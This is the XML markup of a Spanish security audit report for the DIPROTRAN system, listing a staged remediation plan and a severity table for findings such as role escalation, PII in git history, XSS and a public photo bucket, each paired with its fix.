        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5. PLAN DE IMPLEMENTACIÓN POR ETAPAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las etapas están ordenadas por urgencia y dependencia. Las primeras dos son críticas y deberían ejecutarse antes de que el sistema sea usado en producción con datos reales.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8"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ETAPA 1 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">ACCIONES CRÍTICAS INMEDIATAS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ⚡ Esta semana</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-01: Migrar el sistema de roles de user_metadata a una tabla roles controlada solo por service_role. Actualizar las políticas RLS para leer de esta tabla.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-02: Eliminar SETUP_PERSONAL_PII.sql del historial de git (git filter-repo). Cambiar las contraseñas de todos los usuarios si el repo estuvo en algún momento público. Documentar qué personas tuvieron acceso al repo.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-07: Eliminar o marcar como obsoleto SETUP_SUPABASE.sql para evitar confusión futura.</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8"/>
              <w:left w:val="single" w:color="E67E22" w:sz="8"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ETAPA 2 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">CORRECCIONES DE CÓDIGO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  ⚠️ Semana 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-03 + VULN-04: Agregar escapeHTML() a todos los campos de historial.js que se insertan en innerHTML sin escapar (inf.oficial, inf.ayudante, vd.obs, vacKeys, extras).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-05: Cambiar el bucket fotos-moviles a privado en Supabase. Reemplazar getPublicUrl() por createSignedUrl() con expiración de 1 hora. Probar que las fotos existentes sigan siendo accesibles.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">VULN-07: Consolidar en un único archivo SQL de seguridad.</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6404" w:sz="8"/>
              <w:left w:val="single" w:color="856404" w:sz="8"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ETAPA 3 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJORAS DE SEGURIDAD DEFENSIVA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  📋 Mes 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-3.1: Configurar Content Security Policy en el servidor web o en un meta tag del HTML.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-3.3: Crear tabla audit_log con triggers en personal, vehiculos y secciones.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-3.4: Habilitar 2FA (TOTP) en Supabase Auth y requerirlo para usuarios con rol jefe.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-3.6: Limpiar comentarios con información de usuarios reales del código fuente.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-3.5: Definir y documentar política de contraseñas y rotación.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8"/>
              <w:left w:val="single" w:color="27AE60" w:sz="8"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F2F3F4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ETAPA 4 — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJORAS DE EXPERIENCIA Y LARGO PLAZO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  🔮 Trimestral</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-4.4: Implementar cierre de sesión automático por inactividad (30 minutos).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-3.2: Agregar validación de formato en formularios (fechas, emails, teléfonos).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-4.5: Agregar SRI (Subresource Integrity) a los scripts de CDN.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MEJ-4.3: Rate limiting visible en el formulario de login (bloqueo temporal tras N intentos).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Revisar periódicamente las políticas RLS para asegurarse de que ninguna migración nueva las haya sobrescrito.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6. RESUMEN Y ESTADO POR COMPONENTE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4160"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Hallazgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Acción requerida</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VULN-01: Escalación de privilegios (roles)</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CRÍTICA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Migrar a tabla roles + service_role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VULN-02: PII policial en repositorio git</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CRÍTICA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Limpiar historial git, auditar accesos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VULN-03: XSS en inf.oficial/ayudante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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E67E22"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTA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escapeHTML() en historial.js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VULN-04: XSS en vd.obs (observaciones)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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E67E22"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTA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escapeHTML() en historial.js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VULN-05: Bucket de fotos público</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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856404"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIA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Bucket privado + signed URLs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VULN-06: API key en código fuente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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856404"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIA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Documentar, mover a .env (no commitear)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VULN-07: SQL de configuración inconsistente</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color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">BAJA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Consolidar en un único archivo</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MEJ: Sin Content Security Policy</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color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">BAJA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Agregar CSP en servidor o meta tag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MEJ: Sin validación de formatos</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b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO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Validación en formularios (regex)</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MEJ: Sin audit log</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b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO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Tabla audit_log con triggers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MEJ: Sin 2FA para jefe</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b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO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Habilitar TOTP en Supabase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MEJ: Sin timeout de sesión</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b/>
                <w:bCs/>
                <w:color w:val="566573"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO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Auto-logout tras 30 min de inactividad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="4" w:space="8"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditoría realizada con Claude (Anthropic) — Junio 2026 — Sistema DIPROTRAN</w:t>
      </w:r>
    </w:p>
    <w:sectPr>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lvl w:ilvl="1" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="–"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="88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6"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="300"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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2026-06-07T18:57:15.101Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-07T18:57:15.101Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>